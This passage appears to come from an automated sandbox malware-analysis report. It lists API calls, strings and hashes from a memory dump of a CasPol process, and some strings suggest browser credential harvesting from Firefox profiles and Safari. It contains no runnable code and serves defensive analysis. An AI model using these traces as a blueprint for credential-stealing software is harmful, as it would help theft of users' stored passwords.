                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1828521557-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2081463915-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2136311172-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1936579350-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604893535-0
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1213725291-0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1043902810-0
                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
